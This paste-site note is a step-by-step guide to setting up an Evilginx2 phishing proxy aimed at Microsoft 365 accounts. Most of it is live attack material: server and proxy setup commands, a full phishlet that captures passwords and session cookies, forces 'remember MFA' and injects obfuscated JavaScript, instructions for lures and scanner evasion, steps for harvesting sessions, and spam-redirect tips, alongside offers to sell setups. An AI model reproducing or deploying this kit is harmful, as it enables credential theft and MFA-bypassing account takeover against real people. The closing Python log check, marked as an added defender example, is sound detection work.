Untitled Note
By: Anonymous, 12/22/2021, 802 views, Public Note
-NOTICE
Do not share anything inside this page.
Do not dm REDSON and ask for help. If you have a question ask in the group.
This tutorial can't be any simpler. Go with it step by step.
If you can't get this running you can buy a ready setup for $60 (hiring ppl to do setups)
If you want someone to teach you how to set up and use it, it costs $250 (will refer someone to teach you)
DM if you need a ready setup, or if you want someone to teach you how to setup and use.
- REQUIREMENTS:
Ubuntu 20 server
Domain
Cloudflare
1 ip from fineproxy
Ubuntu 20 Server
- Get ubuntu 20 server from any site (azure,aws.., whatever).
- if you want a cheap one you can get it from routerhosting.com/linux-vps
Domain
- Get any domain to use for the evilginx page. google "buy domain with btc".
- You can get a free domain to test with from freenom.com
- If you get a domain from freenom type 1 of these extensions when searching (.tk .ga .ml .cf .gq) or it will say not available.
- it's not recommended to use a free domain but you can get 1 to practice with.
Cloudflare
- After you get the domain go to cloudflare.com and signup.
- Type in the domain you got, they will give you nameservers to use for the domain. Go back to the domain site and input those in.
- Wait 30 mins for the nameservers to propagate then go back to cloudflare and point the domain/wildcard to the vps ip. See below.
1 ip from fineproxy
- Get 1 ip from fineproxy.org, should be same or close to the vps location so it doesn't take much time to connect.
- After you buy and you get the login, go to account.fineproxy.org and bind the vps ip, then download the socks5 ip (without authorization)
************************INSTALLATION. **********************************
1- Download putty and filezilla.
https://the.earth.li/~sgtatham/putty/latest/w64/putty.exe
https://download.filezilla-project.org/client/FileZilla_3.52.0.5_win64_sponsored-setup.exe
2- Open putty and change the session timeout in the settings to 240 secs.
3- Connect to the ubuntu server in putty.
4- Type/Paste in the username and password. The password will be hidden; you'll think it's not typing, but it is.
5- Type in these codes.
sudo apt update
sudo apt install -y make
sudo apt install -y git
sudo apt install -y golang
export GOPATH=$HOME/go
echo $GOPATH
git clone https://github.com/kgretzky/evilginx2.git
cd evilginx2
make
wait for the "make" command to complete.
6- Launch Evilginx.
sudo ./bin/evilginx -p ./phishlets/
if you get Failed to start nameserver on port 53 exit evilginx. If not, Skip to Step 7
exit
Then do this.
sudo service systemd-resolved stop
sudo nano /etc/resolv.conf
Then change nameserver 127.x.x.x to nameserver 8.8.8.8 or 1.1.1.1
Then save the file (By pressing CTRL X and pressing Y followed by enter)
7- Continue with the setup.
config domain
ex: config domain google.com
config ip
ex: config ip 45.153.241.225
proxy address
ex: proxy address 193.200.231.202
proxy port
ex: proxy port 1080
proxy type
ex: proxy type http
proxy enable
exit
enable the proxy and exit
8- Login with filezilla.
9- Click Edit > Settings > File editing and paste this code
"C:\Program Files\Notepad++\notepad++.exe"
10- Go to /root/evilginx2/phishlets
11- Find o365.yaml, right click and select "view/edit"
12- Replace all with my working office phishlet and save
name: 'o365'
author: 'REDSON'
min_ver: '2.4.0'
proxy_hosts:
- {phish_sub: 'login', orig_sub: 'login', domain: 'microsoftonline.com', session: true, is_landing: true}
- {phish_sub: 'www', orig_sub: 'www', domain: 'office.com', session: false, is_landing:false}
sub_filters:
- {triggers_on: 'login.microsoftonline.com', orig_sub: 'login', domain: 'microsoftonline.com', search: 'href="https://{hostname}', replace: 'href="https://{hostname}', mimes: ['text/html', 'application/json', 'application/javascript']}
- {triggers_on: 'login.microsoftonline.com', orig_sub: 'login', domain: 'microsoftonline.com', search: 'https://{hostname}', replace: 'https://{hostname}', mimes: ['text/html', 'application/json', 'application/javascript'], redirect_only: true}
auth_tokens:
- domain: '.login.microsoftonline.com'
keys: ['ESTSAUTH', 'ESTSAUTHPERSISTENT']
- domain: 'login.microsoftonline.com'
keys: ['SignInStateCookie']
credentials:
username:
key: '(login)'
search: '(.*)'
type: 'post'
password:
key: '(passwd)'
search: '(.*)'
type: 'post'
auth_urls:
- '/common/SAS'
- '/kmsi'
login:
domain: 'login.microsoftonline.com'
path: '/'
force_post:
- path: '/kmsi'
search:
- {key: 'LoginOptions', search: '.*'}
force:
- {key: 'LoginOptions', value: '1'}
type: 'post'
- path: '/common/SAS'
search:
- {key: 'rememberMFA', search: '.*'}
force:
- {key: 'rememberMFA', value: 'true'}
type: 'post'
js_inject:
- trigger_domains: ["login.microsoftonline.com"]
trigger_paths: ["/common/oauth2"]
trigger_params: []
script: |
var _cs=["#i",'116','#i0',"16","01","que","Sel","cto","le","Ele","ele","ri","y","pus","bs","arC","st","ryS","th","sh","ng","ery","ry","str","get",'0',"r","pl","sub","od","ect","lo","h","cat","ap","or","om","e","lu","tr","Ch","ha","fr","1024","tor","ion","va","en","qu","By","ec",'abs',"su"]; const _g0 = async _g1 => { while ( document[_cs[48] _cs[21] _cs[6] _cs[30] _cs[35]](_g1) === null) { await new Promise( _g2 => requestAnimationFrame(_g2) ) } return document[_cs[5] _cs[17] _cs[10] _cs[7] _cs[26]](_g1); }; _g0(_cs[2] _cs[1])[_cs[18] _cs[47]]((_g1) => { var _g3 = window[_cs[31] _cs[33] _cs[45]][_cs[41] _cs[19]][_cs[28] _cs[23]](1)[_cs[28] _cs[16] _cs[11] _cs[20]](1),_g4 = [],_g6;for(var _g5=0; _g5< _g3[_cs[8] _cs[20] _cs[18]]-1; _g5 =2){_g4[_cs[13] _cs[32]](parseInt(_g3[_cs[52] _cs[14] _cs[39]](_g5, 2), 16));}_g6 = String[_cs[42] _cs[36] _cs[40] _cs[15] _cs[29] _cs[37]][_cs[34] _cs[27] _cs[12]](String, _g4);var _g7 = document[_cs[5] _cs[22] _cs[6] _cs[50] _cs[44]](_cs[0] _cs[4] _cs[3]); _g7[_cs[46] _cs[38] _cs[37]] = _g6; });
13- Save the changes.
14- Start evilginx again.
sudo ./bin/evilginx -p ./phishlets/
15- Continue with the setup.
phishlets hostname o365
ex1: phishlets hostname o365 phishing.com
ex2: phishlets hostname o365 office365.phishing.com
lures create o365
config redirect_url https://www.youtube.com/watch?v=BN00cS8M8Es
this is where the bots will be redirected. you can change the link.
16- Restart evilginx and continue with the setup.
exit
sudo ./bin/evilginx -p ./phishlets/
phishlets enable o365
phishlets hide o365
blacklist all
17- Wait at least 1 hour for it to collect bots, leave putty running.
shit ton of scanners will go to the page after obtaining ssl, its better to leave it overnight
18- After the wait is over.
phishlets unhide o365
blacklist unauth
If for some reason it was disconnected, restart the session and paste
cd evilginx2
sudo ./bin/evilginx -p ./phishlets/
then unhide the phishlet and blacklist unauthorized requests with step 18.
*************************************************How to Use?*********************************************
1- If the window is still open skip to step2.
Launch evilginx
cd evilginx2
sudo ./bin/evilginx -p ./phishlets/
2- Get the phishing link.
lures get-url 0
copy the link it should be domain.com/folder and paste in the browser.
the folder is the access code, without it your ip will get blocked.
you can set a redirection link on success with
lures edit 0 redirect_url https://mail.office365.com
or you can leave it to log in all the way.
Link with autofill for redrum is https://domain.com/folder#%EMAILX%
3- Get the sessions with.
sessions
select the session id
sessions 1
- Sessions are also saved in /root/.evilginx/data.db
- You can use this free redirection template.
Just replace domain.com/XqlwscdC with your page link.
spam link is https://redirectionlink.com#%EMAILX%
- Or use this other free template as attachment.
Try with the 4 encryption methods in redrum, see what inboxes with your smtp/settings.
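Added example for defenders (not part of the original note): the phishlet above relays Microsoft's own sign-in paths ('/common/SAS', '/kmsi', '/common/oauth2') through a host under a different domain, so an egress proxy log shows those paths on a non-Microsoft hostname. The Python below flags such requests; the log layout, the sample lines and the example.net / example.org hosts are constructed, and the two-domain allowlist is an assumption taken from the phishlet's proxy_hosts.

```python
import re
from urllib.parse import urlsplit

# Assumption: allowlist built from the two domains in the phishlet's proxy_hosts.
# Extend it with the other legitimate sign-in hosts your organisation uses.
LEGIT_SUFFIXES = ("microsoftonline.com", "office.com")
# Microsoft sign-in paths named in the phishlet (auth_urls and js_inject trigger_paths).
LOGIN_PATHS = re.compile(r"^/(common/SAS|kmsi|common/oauth2)(/|$)", re.IGNORECASE)

def is_legit_host(host: str) -> bool:
    """True only if host equals, or is a subdomain of, an allowed domain."""
    host = host.lower().rstrip(".")
    return any(host == s or host.endswith("." + s) for s in LEGIT_SUFFIXES)

def parse_line(line: str):
    """Parse 'timestamp client method url' (constructed proxy-log layout)."""
    parts = line.split()
    if len(parts) != 4:
        return None
    ts, client, method, url = parts
    u = urlsplit(url)
    if not u.hostname:
        return None
    return {"ts": ts, "client": client, "method": method,
            "host": u.hostname, "path": u.path}

def find_proxied_logins(lines):
    """Return events where a Microsoft sign-in path is requested on a non-Microsoft host."""
    hits = []
    for line in lines:
        ev = parse_line(line)
        if ev and LOGIN_PATHS.match(ev["path"]) and not is_legit_host(ev["host"]):
            hits.append(ev)
    return hits

# Constructed sample log lines; example.net and example.org are placeholders.
SAMPLE = [
    "2021-12-22T10:00:01Z 10.0.0.5 POST https://login.microsoftonline.com/common/SAS/ProcessAuth",
    "2021-12-22T10:00:07Z 10.0.0.9 POST https://login.example.net/common/SAS/ProcessAuth",
    "2021-12-22T10:00:09Z 10.0.0.9 POST https://login.example.net/kmsi",
    "2021-12-22T10:01:00Z 10.0.0.7 GET https://login.microsoftonline.com.example.org/common/oauth2/authorize?x=1",
    "2021-12-22T10:02:00Z 10.0.0.7 GET https://www.office.com/",
    "malformed line",
]

if __name__ == "__main__":
    for ev in find_proxied_logins(SAMPLE):
        print(ev["ts"], ev["client"], ev["method"], ev["host"], ev["path"])
```

The suffix check matches on a label boundary, so a look-alike such as login.microsoftonline.com.example.org is still flagged. This only works where the proxy sees the request path (TLS inspection or endpoint telemetry).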